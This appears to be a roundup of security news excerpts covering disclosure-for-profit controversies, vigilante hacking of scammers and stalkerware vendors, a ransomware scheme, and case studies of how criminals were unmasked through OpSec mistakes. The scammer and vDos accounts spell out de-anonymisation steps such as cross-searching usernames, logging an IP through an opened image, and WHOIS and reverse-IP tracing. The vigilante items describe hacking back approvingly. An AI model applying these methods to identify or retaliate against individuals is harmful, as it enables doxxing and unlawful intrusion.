Pacemaker supplier St Jude has sued both MedSec and investment research biz Muddy Waters in Minnesota, America, as well as three other individuals it says falsely reported serious vulnerabilities in its pacemakers and defibrillators.

The allegations [PDF] include false advertising, false statements, conspiracy, and market manipulation.

- Article

AMD

Last week, the Israeli security company CTS-Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names -- RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA -- and logos we've come to expect from these sorts of things. What's new is that the company only gave AMD a day's notice, which breaks with every norm about responsible disclosure. 

But CTS's website touting AMD's flaws also contained a disclaimer that threw some shadows on the company's motives: "Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports," reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn't respond.

- Schneier Blog Post
- Article

Equifax

Before Equifax revealed its massive data breach last year, four of its executives sold their shares. Four days after news of the breach hit the press, the stock had plunged 18.4%. (One of those executives, Jun Ying, was charged on Wednesday for insider trading.)
- Article

Revenge/Vigilantes

Ransomware a Tech Support Scammer

Tech support scammers messed with a hacker's mother, so he retaliated with ransomware. He faked falling for the scam, and then sent the scammer a fake photo of a credit card in a zip file, which when unzipped actually triggered ransomware. 
- Article

CEO wire transfer scammers open poisoned PDF invoices

Hacker takes down CEO wire transfer scammers, sends their Win 10 creds to the cops. 'Whaling' attackers fall for poison PDF 'invoices'.
- Article

Hacker wipes spyware servers multiple times

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Ransomware

Spread Popcorn Time Ransomware, get chance of free Decryption Key

Yesterday a new in-development ransomware was discovered by MalwareHunterTeam called Popcorn Time that intends to give victims a very unusual, and criminal, way of getting a free decryption key for their files.  With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
- Article

OpSec Violations

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploaded a video to YouTube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative journalist Brian Krebs notes that at the 2:48 mark in the video, an MSN Chat window shows up that clearly shows the user is logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.

[Article]

eBay Scammer [Sept 2016]

Person had $500 Apple gift card, wanted to sell for bitcoin due to lack of chargebacks.

Several potential buyers appeared, all wanting it for 50% or less of the card's worth. The seller found one willing to pay 75% on a reddit darkmarket.

Seller sends the card numbers so the buyer can verify the balance, plus details on how to verify the seller's identity (a news article about the winner of a competition; the blog link in the article leads to the winner's blog, whose "about me" page lists social usernames, one of which is the reddit account the communication is taking place on).

Buyer says the seller could have just bought that reddit account, insists on not going first, and says he has an eBay account with high positive feedback and will prove it. Seller says the buyer could have bought the eBay account; buyer replies that he couldn't, because eBay locks accounts out on geo/IP changes. Buyer sends the seller a message from the high-reputation eBay account to prove he owns it.

Seller sends pins for cards + bitcoin address for payment + pictures of card hosted on his site + tracking number for mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay; the buyer replies on eBay that his account was hacked and it wasn't him.

Seller decides to track buyer/scammer down. From the scammer's eBay account, the seller had a username + city location. From the scammer's reddit account, the seller had a username.

A google search for the scammer's reddit and eBay usernames uncovered a Steam account which used both names, confirming it was not a hacked eBay account but the same person who went by two nicknames. The google search also uncovered a profile on a looking-for-job website which contained the scammer's first name, first letter of last name, and city location (which matched the one on eBay).

Seller had sent buyer an image of the cards. Scammer had opened it, which gave the seller the scammer's IP address and city (which again matched the one on eBay).

Seller now did a Facebook search for the scammer's eBay username. In the text post of a random gamer, the seller saw the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately the mention wasn't a link to the profile, only plain text, due to the privacy settings of the tagged user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot that random gamer posted that had the scoreboard from LoL (League of Legends) in the foreground AND facebook chat open in the background, with the scammer's full name visible (matching the first name plus first letter of last name seller got from the job website). So from this, seller discovered scammer's full first and last name.

Seller now did a Facebook search of scammer's last name and city, and found the scammer's mother. He sent the scammer's mother a Facebook message.

[Article]

vDos [Sept 2016]

Investigator was analyzing random ddos-for-hire site PoodleStresser. He found a vulnerability, which allowed downloading config data on the site. This data showed PoodleStresser connects to api of ddos-for-hire site vDOS to power their attacks (so PoodleStresser is just a reseller of vDOS).

vDos is a much larger site of the same ilk, hidden behind Cloudflare (so the site's true IP is not known). Using the downloaded config data from PoodleStresser gave the investigator API access to vDos. The investigator found a serious vulnerability in the API of vDos that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at Verdina.net).

From the vDos dumped database, all tech support tickets were extracted. From these support tickets, it was discovered that all attacks vDos clients attempted to make against Israel failed (suggesting owners were in Israel trying to avoid attention of Israeli authorities). Additionally, the vDos owners' online nicknames were found in the support tickets as P1st0 and AppleJ4ck.

From the vDos extracted config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of which are Israeli) whenever a high-level support ticket was created, via the online SMS service Nexmo.com. Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WHOIS records to the domain v-email.org under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A WHOIS lookup on these domains found one of them registered to a phone number matching one of the phone numbers vDos' config files blasted text messages to.

A google search for the owner's aliases (that were discovered in the tech support tickets) found listings they made on places like hackforums.net, peddling warez and services.

[Article]

KickAss Torrents [July 2016]

The feds tracked the owner of KAT through a variety of methods, though mostly through accessing bank and server records.

Possible angle: the client had a website example.com, which the Feds saw pointed to IP address 5.5.5.5. A reverse DNS lookup on 5.5.5.5 showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and its whois record was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes from a specific IP address (one that wasn't hidden behind a proxy). The same IP address was used by the person managing the Facebook page for KAT. A Coinbase account used to collect bitcoin donations was also tied to the same email address, and the bitcoin address behind that Coinbase account was the one shown on the KAT website for donations.

[Article 1, Article 2, Article 3]